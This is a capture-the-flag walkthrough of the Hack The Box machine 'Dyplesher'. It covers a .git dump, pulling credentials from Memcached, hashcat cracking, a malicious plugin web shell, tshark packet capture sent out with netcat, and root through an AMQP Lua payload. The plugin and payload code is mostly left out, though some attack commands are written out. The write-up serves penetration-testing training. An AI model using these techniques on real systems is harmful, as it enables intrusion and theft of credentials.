HTB Walkthrough Dyplesher


Dyplesher is released on 23 th of may in 2020


This machine was insane rated. in order to gain a foothold we had to dump .git folder.


After a lot of enumeration and a few logins we finally arrived to the login page where we can upload a malicious plugin so we can get a web shell with code execution, this way I could write my ssh key to this user and were able to login on the box, after looking around we see that we have a group called wireshark, this means we can intercept packets and read the output from it, After studying those files we got some new credentials and were able to get the user.txt


Felamos his home folder contains a hint that there is a tool wich reviews the code automatically, after some research I found out this could be done with AMPQ. To get root we took advantage of the program AMPQ



nmap -p- -A


Going to shows: shows:

Nothing interesting to find on here

page showed ealier a host name test.dyplesher.htb adding test.dyplesher.htb to /etc/hosts

http://test.dyplesher.htb shows:

Couldn’t find anything on this page so i moved on. shows:

Also nothing to find right now

nmap result showed there should be a .git directory on port 80: shows:

But since there is a vhost we should check this one as well:

Looks like something is there but no access time to poke around a bit.

Found something about git that there should be a way to dump git files, found the folowing tool:

mkdir gitdump

bash http://test.dyplesher.htb/.git/ /root/s3cwalk/dyplesher/gitdump/

We could extract some files

When we look into the index file we see the following:

Looks like this file has been removed, after some research there is a change we could restore thise files with git restore:

git restore index.php

We found some credentials for Memcached, this port was also open on the nmap so time to go poke around there.


Getting vallues out of memcached:

memccat email –servers= –username=felamos –password=zxcvbnm


memccat username –servers= –username=felamos –password=zxcvbnm


memccat password –servers= –username=felamos –password=zxcvbnm


We found some value information, lets try now to decrypt these bcrypt hashes

hashcat64.exe -m 3200 hashes.txt rockyou.txt


We can now login to

When logged in there seems not much there but under releases there is a file called

This file contains a folder repositories with bundle files types since this is a Repo let’s try to git clone them:

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

git clone 4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

Git clone 6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

git clone d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

in this folder is a DB file which contains a hash:



Also bcrypt when we decrypt this one the password is alexis1

Next step is to find out where to login with it and with what username, from the web enumeration earlier there is still a page we weren’t able to login to so let’s try that one:

and we are logged in:

Time to develop our own malicious plugin

adding new java package:

adding new class:

adding plugin.yml:

also create pom.xml

plugin.yml contains:

main contains:

pom files contains:

Time to build jar file:

upload plugin

load plugin

check if plugin is loaded

visit: http://test.dyplesher.htb/secwalk.php?cmd=id

upload our ssh rsa key to MinatoTW:

login with ssh:

id shows that we can run wireshark, with wireshark we can intercept the network traffic

tshark -i any -w secwalk.pcap

sending file with netcat to my machine so i have a visual look with wireshark:

send: nc -w 3 11211 < secwalk.pcap

recieve: nc -l -p 11211 > secwalk.pcap

found credentials in AMQP packet:

and we got our first flag:

Felamos his home folder contains a hint for root privesc:

Ealier in the wireshark capture there were also creds availble for AMPQ service, this service does exactly what they mention here so lets try to exploit that.

Firs we need to create/edit an python script so we can connect with the service:

after this is done we create a lua file wich write our RSA ssh key to the root folder:

our lua payload file looks like:

python -m SimpleHTTPServer 5672


we can see the command was successful:

and we got root on the Box:

Job done

Made by: S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply